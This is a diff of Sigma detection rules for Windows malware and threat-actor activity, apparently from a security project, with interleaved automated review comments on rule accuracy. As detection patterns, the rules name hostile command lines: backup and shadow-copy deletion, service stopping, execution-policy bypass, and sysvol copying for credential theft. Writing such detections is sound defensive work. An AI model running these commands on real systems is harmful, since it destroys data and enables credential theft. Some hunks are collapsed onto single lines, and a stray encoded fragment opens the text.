- 8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA
diff --git a/sigma/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml b/sigma/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml
index 1a027c1e4..26e3547c7 100644
--- a/sigma/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml
+++ b/sigma/builtin/emerging-threats/2019/Malware/Formbook/proc_creation_win_malware_formbook.yml
@@ -1,10 +1,7 @@
title: Formbook Process Creation
id: 032f5fb3-d959-41a5-9263-4173c802dc2b
status: test
-description: Detects Formbook like process executions that inject code into a set
- of files in the System32 folder, which executes a special command command line
- to delete the dropper from the AppData Temp folder. We avoid false positives by
- excluding all parent process with command line parameters.
+description: Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.
references:
- https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer
- https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/
@@ -25,28 +22,31 @@ detection:
EventID: 4688
Channel: Security
selection1:
+ # Parent command line should not contain a space value
+ # This avoids false positives not caused by process injection
+ # e.g. wscript.exe /B sysmon-install.vbs
ParentCommandLine|startswith:
- C:\Windows\System32\
- C:\Windows\SysWOW64\
ParentCommandLine|endswith: .exe
selection2:
- - CommandLine|contains|all:
- - /c
- - del
- - C:\Users\
- - \AppData\Local\Temp\
- - CommandLine|contains|all:
- - /c
- - del
- - C:\Users\
- - \Desktop\
- - CommandLine|contains|all:
- - /C
- - type nul >
- - C:\Users\
- - \Desktop\
+ - CommandLine|contains|all:
+ - /c
+ - del
+ - C:\Users\
+ - \AppData\Local\Temp\
+ - CommandLine|contains|all:
+ - /c
+ - del
+ - C:\Users\
+ - \Desktop\
+ - CommandLine|contains|all:
+ - /C
+ - type nul >
+ - C:\Users\
+ - \Desktop\
selection3:
- CommandLine|endswith: .exe
+ CommandLine|endswith: .exe
condition: process_creation and (all of selection*)
fields:
- CommandLine
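Review bot: The three comments added at the top of `selection1` describe a "no space" constraint that the selection does not actually express: `ParentCommandLine|startswith` on the two system directories plus `ParentCommandLine|endswith: .exe` still matches a parent path that contains spaces, and only excludes arguments as long as the last argument does not itself end in `.exe`. Wording the comment as what the code checks would be safer, e.g. `# Parent command line is expected to be a bare System32/SysWOW64 executable path with no trailing arguments, which avoids false positives from parents such as 'wscript.exe /B sysmon-install.vbs'`. Since `condition: process_creation and (all of selection*)` makes this selection mandatory, the comment is the only place the intent is recorded, so it should be accurate.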
diff --git a/sigma/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml b/sigma/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml
index 84f5705de..c44323e1a 100644
--- a/sigma/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml
+++ b/sigma/builtin/emerging-threats/2019/Malware/LockerGoga/proc_creation_win_malware_lockergoga_ransomware.yml
@@ -21,7 +21,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains: -i SM-tgytutrc -s
+ CommandLine|contains: -i SM-tgytutrc -s
condition: process_creation and selection
falsepositives:
- Unlikely
diff --git a/sigma/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml b/sigma/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml
index d5e525499..12c863c7c 100644
--- a/sigma/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml
+++ b/sigma/builtin/emerging-threats/2019/Malware/QBot/proc_creation_win_malware_qbot.yml
@@ -1,8 +1,7 @@
title: Potential QBot Activity
id: 4fcac6eb-0287-4090-8eea-2602e4c20040
status: stable
-description: Detects potential QBot activity by looking for process executions used
- previously by QBot
+description: Detects potential QBot activity by looking for process executions used previously by QBot
references:
- https://twitter.com/killamjr/status/1179034907932315648
- https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/
@@ -22,11 +21,11 @@ detection:
Channel: Security
selection1:
ParentProcessName|endswith: \WinRAR.exe
- NewProcessName|endswith: \wscript.exe
+ NewProcessName|endswith: \wscript.exe
selection2:
- CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type '
+ CommandLine|contains: ' /c ping.exe -n 6 127.0.0.1 & type '
selection3:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- regsvr32.exe
- C:\ProgramData
- .tmp
diff --git a/sigma/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml b/sigma/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml index f07e6b7e3..8b10b62ae 100644 --- a/sigma/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml +++ b/sigma/builtin/emerging-threats/2019/Malware/Ryuk/proc_creation_win_malware_ryuk.yml @@ -1,17 +1,16 @@ title: Potential Ryuk Ransomware Activity id: c37510b8-2107-4b78-aa32-72f251e7a844 related: - - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 - type: similar - - id: 0acaad27-9f02-4136-a243-c357202edd74 - type: obsoletes + - id: 58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27 + type: similar + - id: 0acaad27-9f02-4136-a243-c357202edd74 + type: obsoletes status: stable description: Detects Ryuk ransomware activity references: - https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/ - https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ -author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems) date: 2019/12/16 modified: 2023/02/03 tags: @@ -26,25 +25,25 @@ detection: EventID: 4688 Channel: Security selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - Microsoft\Windows\CurrentVersion\Run - C:\users\Public\ selection_del: - CommandLine|contains|all: + CommandLine|contains|all: - del /s /f /q c:\ - \*.bac - \*.bak - \*.bkf selection_net: - CommandLine|contains|all: + CommandLine|contains|all: - ' stop ' - ' /y' - CommandLine|contains: + CommandLine|contains: - samss - audioendpointbuilder - unistoresvc_ - AcrSch2Svc - NewProcessName|endswith: + NewProcessName|endswith: - \net.exe - \net1.exe condition: process_creation and (1 of selection_*) 
diff --git a/sigma/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml b/sigma/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml
index 7d4ffd93a..fb36aa973 100644
--- a/sigma/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml
+++ b/sigma/builtin/emerging-threats/2019/Malware/Snatch/proc_creation_win_malware_snatch_ransomware.yml
@@ -1,8 +1,7 @@
title: Potential Snatch Ransomware Activity
id: 5325945e-f1f0-406e-97b8-65104d393fff
status: stable
-description: Detects specific process characteristics of Snatch ransomware word document
- droppers
+description: Detects specific process characteristics of Snatch ransomware word document droppers
references:
- https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/
author: Florian Roth (Nextron Systems)
@@ -20,8 +19,8 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
- - shutdown /r /f /t 00
+ CommandLine|contains:
+ - shutdown /r /f /t 00 # Shutdown in safe mode immediately
- net stop SuperBackupMan
condition: process_creation and selection
fields:
@@ -29,7 +28,6 @@ fields:
- NewProcessName
- ComputerName
falsepositives:
- - Scripts that shutdown the system immediately and reboot them in safe mode are
- unlikely
+ - Scripts that shutdown the system immediately and reboot them in safe mode are unlikely
level: high
ruletype: Sigma
diff --git a/sigma/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml b/sigma/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml
index cfea059b5..48f03fba3 100644
--- a/sigma/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml
+++ b/sigma/builtin/emerging-threats/2019/TA/APC-C-12/proc_creation_win_apt_aptc12_bluemushroom.yml
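Review bot: The comment added to the `shutdown /r /f /t 00` entry in the second hunk says "Shutdown in safe mode immediately", but the flags only express a forced (`/f`) restart (`/r`) with a zero-second timeout (`/t 00`); nothing in this command line selects safe mode, so the comment attributes behaviour to the wrong indicator. Suggest `# Forced immediate restart; safe mode itself is not selected by this command` so an analyst triaging a hit does not expect a safe-mode boot to be visible in this event. The `net stop SuperBackupMan` entry that completes the selection is the better place to mention the backup-service angle if one is wanted.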
@@ -1,12 +1,10 @@ title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0 status: test -description: Detects potential BlueMushroom DLL loading activity via regsvr32 from - AppData Local +description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local references: - https://pbs.twimg.com/media/EF3yLGoWkAEGeLa?format=jpg -author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron - Systems) +author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) date: 2019/10/02 modified: 2023/03/29 tags: @@ -21,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - regsvr32 - \AppData\Local\ - .dll diff --git a/sigma/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml b/sigma/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml index 4a2498120..bd9f91174 100644 --- a/sigma/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml +++ b/sigma/builtin/emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml @@ -1,8 +1,7 @@ title: APT31 Judgement Panda Activity id: 03e2746e-2b31-42f1-ab7a-eb39365b2422 status: test -description: Detects APT31 Judgement Panda activity as described in the Crowdstrike - 2019 Global Threat Report +description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Florian Roth (Nextron Systems) 
@@ -23,15 +22,15 @@ detection: EventID: 4688 Channel: Security selection_ldifde: - CommandLine|contains|all: + CommandLine|contains|all: - ldifde - -f -n - eprod.ldf selection_lateral_movement: - CommandLine|contains|all: + CommandLine|contains|all: - copy \\\\ - c$ - CommandLine|contains: + CommandLine|contains: - \aaaa\procdump64.exe - \aaaa\netsess.exe - \aaaa\7za.exe diff --git a/sigma/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml b/sigma/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml index c4f18518f..cdbd7ffa9 100644 --- a/sigma/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml +++ b/sigma/builtin/emerging-threats/2019/TA/Bear-APT-Activity/proc_creation_win_apt_bear_activity_gtr19.yml @@ -1,8 +1,7 @@ title: Potential Russian APT Credential Theft Activity id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee status: stable -description: Detects Russian group activity as described in Global Threat Report 2019 - by Crowdstrike +description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Florian Roth (Nextron Systems) @@ -21,11 +20,11 @@ detection: EventID: 4688 Channel: Security selection_xcopy: - CommandLine|contains|all: + CommandLine|contains|all: - xcopy /S /E /C /Q /H \\\\ - \sysvol\ selection_adexplorer: - CommandLine|contains|all: + CommandLine|contains|all: - adexplorer -snapshot "" c:\users\ - \downloads\ - .snp diff --git a/sigma/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml b/sigma/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml index 99ba56a51..31eff7409 100644 --- a/sigma/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml 
+++ b/sigma/builtin/emerging-threats/2019/TA/EmpireMonkey/proc_creation_win_apt_empiremonkey.yml @@ -20,8 +20,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: - - /e:jscript + CommandLine|contains|all: + - /e:jscript # This is a guess since the report doesn't mention the method of execution. This assumes that it is achieved via specifying the execution engine - \Local\Temp\Errors.bat condition: process_creation and selection falsepositives: diff --git a/sigma/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml b/sigma/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml index 64353dfd2..2fc96f369 100644 --- a/sigma/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml +++ b/sigma/builtin/emerging-threats/2019/TA/EquationGroup/proc_creation_win_apt_equationgroup_dll_u_load.yml @@ -1,8 +1,7 @@ title: Equation Group DLL_U Export Function Load id: d465d1d8-27a2-4cca-9621-a800f37cf72e status: stable -description: Detects a specific export function name used by one of EquationGroup - tools +description: Detects a specific export function name used by one of EquationGroup tools references: - https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type= - https://twitter.com/cyb3rops/status/972186477512839170 @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - - CommandLine|contains: -export dll_u - - CommandLine|endswith: - - ',dll_u' - - ' dll_u' + - CommandLine|contains: -export dll_u + - CommandLine|endswith: + - ',dll_u' + - ' dll_u' condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml b/sigma/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml index 60036d28b..8dcd7da61 100644 
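Review bot: The comment appended to `/e:jscript` records that this value is a guess, yet the selection is `CommandLine|contains|all`, so the whole rule hinges on that guessed token: if the `Errors.bat` payload was launched without an explicit `/e:jscript` engine switch, the rule never fires. The uncertainty belongs in the rule's `description` or `status` (both outside this hunk) rather than in a trailing comment longer than the rule itself; if it stays inline, move it onto its own line above the list item so the value remains readable. Whether `\Local\Temp\Errors.bat` alone is specific enough to stand without the guessed token is worth stating in that description as well.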
--- a/sigma/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml +++ b/sigma/builtin/emerging-threats/2019/TA/MustangPanda/proc_creation_win_apt_mustangpanda.yml @@ -21,18 +21,18 @@ detection: EventID: 4688 Channel: Security selection_cli: - - CommandLine|contains: - - Temp\wtask.exe /create - - '%windir:~-3,1%%PUBLIC:~-9,1%' - - '/tn "Security Script ' - - '%windir:~-1,1%' - - CommandLine|contains|all: - - /E:vbscript - - C:\Users\ - - .txt - - /F + - CommandLine|contains: + - Temp\wtask.exe /create + - '%windir:~-3,1%%PUBLIC:~-9,1%' + - '/tn "Security Script ' + - '%windir:~-1,1%' + - CommandLine|contains|all: + - /E:vbscript + - C:\Users\ + - .txt + - /F selection_img: - NewProcessName|endswith: Temp\winwsh.exe + NewProcessName|endswith: Temp\winwsh.exe condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml b/sigma/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml index b9b04619f..f5e5a7331 100644 --- a/sigma/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml +++ b/sigma/builtin/emerging-threats/2019/TA/Operation-Wocao/proc_creation_win_apt_wocao.yml @@ -1,8 +1,8 @@ title: Operation Wocao Activity id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab related: - - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d - type: derived + - id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d + type: derived status: test description: Detects activity mentioned in Operation Wocao report references: 
@@ -24,14 +24,13 @@ tags:
logsource:
category: process_creation
product: windows
- definition: The 'System Security Extension' audit subcategory need to be enabled
- to log the EID 4697
+ definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697
detection:
process_creation:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ CommandLine|contains:
- checkadmin.exe 127.0.0.1 -all
- netsh advfirewall firewall add rule name=powershell dir=in
- cmd /c powershell.exe -ep bypass -file c:\s.ps1
diff --git a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml
index 984727038..243fcc6f3 100644
--- a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml
+++ b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-0688/win_vul_cve_2020_0688.yml
@@ -1,8 +1,7 @@
title: CVE-2020-0688 Exploitation via Eventlog
id: d6266bf5-935e-4661-b477-78772735a7cb
status: test
-description: Detects the exploitation of Microsoft Exchange vulnerability as described
- in CVE-2020-0688
+description: Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
references:
- https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/
- https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/
diff --git a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml
index fd72bb25e..c3010eb88 100644
--- a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml
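Review bot: The reflowed `definition` line still says the 'System Security Extension' audit subcategory is needed "to log the EID 4697", while the `process_creation` block a few lines below in the same hunk filters on `EventID: 4688` from the `Security` channel, so the stated logging requirement and the detection disagree. If the rule really depends on 4688, the definition should name the Process Creation audit requirement instead; if 4697 was intended, the EventID filter is the wrong one. The grammar also needs `need` → `needs`. The text is pre-existing, but the commit rewrites this exact line and is the natural place to reconcile it.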
+++ b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-10189/proc_creation_win_exploit_cve_2020_10189.yml @@ -1,8 +1,7 @@ title: Exploited CVE-2020-10189 Zoho ManageEngine id: 846b866e-2a57-46ee-8e16-85fa92759be7 status: test -description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization - vulnerability reported as CVE-2020-10189 +description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 references: - https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html - https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224 @@ -27,7 +26,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: DesktopCentral_Server\jre\bin\java.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe diff --git a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml index 65c7d735a..90104f0f8 100644 --- a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml +++ b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1048/proc_creation_win_exploit_cve_2020_1048.yml @@ -1,8 +1,7 @@ title: Suspicious PrinterPorts Creation (CVE-2020-1048) id: cc08d590-8b90-413a-aff6-31d1a99678d7 status: test -description: Detects new commands that add new printer port which point to suspicious - file +description: Detects new commands that add new printer port which point to suspicious file references: - https://windows-internals.com/printdemon-cve-2020-1048/ author: EagleEye Team, Florian Roth 
@@ -22,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains: Add-PrinterPort -Name + CommandLine|contains: Add-PrinterPort -Name selection2: - CommandLine|contains: + CommandLine|contains: - .exe - .dll - .bat selection3: - CommandLine|contains: Generic / Text Only + CommandLine|contains: Generic / Text Only condition: process_creation and ((selection1 and selection2) or selection3) falsepositives: - New printer port install on host diff --git a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml index d60ee4545..cb7a47f54 100644 --- a/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml +++ b/sigma/builtin/emerging-threats/2020/Exploits/CVE-2020-1350/proc_creation_win_exploit_cve_2020_1350.yml @@ -1,8 +1,7 @@ title: DNS RCE CVE-2020-1350 id: b5281f31-f9cc-4d0d-95d0-45b91c45b487 status: test -description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the - detection of suspicious sub process +description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process references: - https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ - https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html @@ -26,7 +25,7 @@ detection: selection: ParentProcessName|endswith: \System32\dns.exe filter: - NewProcessName|endswith: + NewProcessName|endswith: - \System32\werfault.exe - \System32\conhost.exe - \System32\dnscmd.exe diff --git a/sigma/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml b/sigma/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml index d1dc915ba..5b83188eb 100644 
--- a/sigma/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml +++ b/sigma/builtin/emerging-threats/2020/Malware/Blue-Mockingbird/proc_creation_win_malware_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird id: c3198a27-23a0-4c2c-af19-e5328d49680e related: - - id: ce239692-aa94-41b3-b32f-9cab259c96ea - type: merged + - id: ce239692-aa94-41b3-b32f-9cab259c96ea + type: merged status: test description: Attempts to detect system changes made by Blue Mockingbird references: @@ -23,13 +23,13 @@ detection: EventID: 4688 Channel: Security sc_cmd: - CommandLine|contains|all: + CommandLine|contains|all: - sc config - wercplsupporte.dll - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe wmic_cmd: - CommandLine|endswith: COR_PROFILER - NewProcessName|endswith: \wmic.exe + CommandLine|endswith: COR_PROFILER + NewProcessName|endswith: \wmic.exe condition: process_creation and (sc_cmd or wmic_cmd) falsepositives: - Unknown diff --git a/sigma/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml b/sigma/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml index a6548ede8..45ea2cd02 100644 --- a/sigma/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml +++ b/sigma/builtin/emerging-threats/2020/Malware/Emotet/proc_creation_win_malware_emotet_rundll32_execution.yml 
@@ -1,8 +1,7 @@ title: Potential Emotet Rundll32 Execution id: 54e57ce3-0672-46eb-a402-2c0948d5e3e9 status: test -description: Detecting Emotet DLL loading by looking for rundll32.exe processes with - command lines ending in ,RunDLL or ,Control_RunDLL +description: Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL references: - https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html - https://cyber.wtf/2021/11/15/guess-whos-back/ @@ -21,14 +20,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|endswith: + CommandLine|endswith: - ',RunDLL' - ',Control_RunDLL' + # - ',#1' too generic - function load by ordinal is not Emotet specific filter_legitimate_dll: - CommandLine|endswith: + CommandLine|endswith: - .dll,Control_RunDLL - .dll",Control_RunDLL - .dll',Control_RunDLL diff --git a/sigma/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml b/sigma/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml index d92a5c12e..4879d7db9 100644 --- a/sigma/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml +++ b/sigma/builtin/emerging-threats/2020/Malware/Ke3chang-TidePool/proc_creation_win_malware_ke3chang_tidepool.yml 
@@ -1,8 +1,7 @@
title: Potential Ke3chang/TidePool Malware Activity
id: 7b544661-69fc-419f-9a59-82ccc328f205
status: test
-description: Detects registry modifications potentially related to the Ke3chang/TidePool
- malware as seen in campaigns running in 2019 and 2020
+description: Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020
references:
- https://web.archive.org/web/20200618080300/https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf
- https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
@@ -22,7 +21,12 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains:
+ # Ke3chang and TidePool both modify the IEHarden registry key, as well as the following list of keys.
+ # Setting these registry keys is unique to the Ke3chang and TidePool malware families.
+ # HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations
+ # HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
+ # HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEharden
+ CommandLine|contains:
- -Property DWORD -name DisableFirstRunCustomize -value 2 -Force
- -Property String -name Check_Associations -value
- -Property DWORD -name IEHarden -value 0 -Force
diff --git a/sigma/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml b/sigma/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml
index c6519dbb2..1175563a7 100644
--- a/sigma/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml
+++ b/sigma/builtin/emerging-threats/2020/Malware/Maze/proc_creation_win_malware_maze_ransomware.yml
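Review bot: The second comment added in the `selection` block claims that setting these registry values is "unique to the Ke3chang and TidePool malware families", which overstates it: `Check_Associations`, `DisableFirstRunCustomize` and `IEHarden` are ordinary Internet Explorer settings that legitimate configuration scripts can also write, and because `CommandLine|contains` is an OR over its list, a single matching fragment fires the rule. A more defensible comment is `# These IE settings can also be set by legitimate configuration scripts; the exact -Property/-name/-value fragments below are the ones observed in Ke3chang/TidePool`. The comment also spells the third key `IEharden` while the matched fragment uses `IEHarden`; registry names are case-insensitive, but the comment should mirror the rule to avoid confusing a reader who greps for one spelling.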
@@ -1,8 +1,7 @@
title: Potential Maze Ransomware Activity
id: 29fd07fc-9cfd-4331-b7fd-cc18dfa21052
status: test
-description: Detects specific process characteristics of Maze ransomware word document
- droppers
+description: Detects specific process characteristics of Maze ransomware word document droppers
references:
- https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
- https://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/
@@ -21,19 +20,21 @@ logsource:
category: process_creation
product: windows
detection:
+ # Dropper
process_creation:
EventID: 4688
Channel: Security
selection1:
ParentProcessName|endswith: \WINWORD.exe
- NewProcessName|endswith: .tmp
+ NewProcessName|endswith: .tmp
selection2:
- CommandLine|endswith: shadowcopy delete
- NewProcessName|endswith: \wmic.exe
+ CommandLine|endswith: shadowcopy delete
+ # Specific Pattern
+ NewProcessName|endswith: \wmic.exe
ParentProcessName|contains: \Temp\
selection3:
- CommandLine|endswith: shadowcopy delete
- CommandLine|contains: \..\..\system32
+ CommandLine|endswith: shadowcopy delete
+ CommandLine|contains: \..\..\system32
condition: process_creation and (1 of selection*)
fields:
- SubjectUserName
diff --git a/sigma/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml b/sigma/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml
index 514cef348..bd10990aa 100644
--- a/sigma/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml
+++ b/sigma/builtin/emerging-threats/2020/TA/Evilnum/proc_creation_win_apt_evilnum_jul20.yml
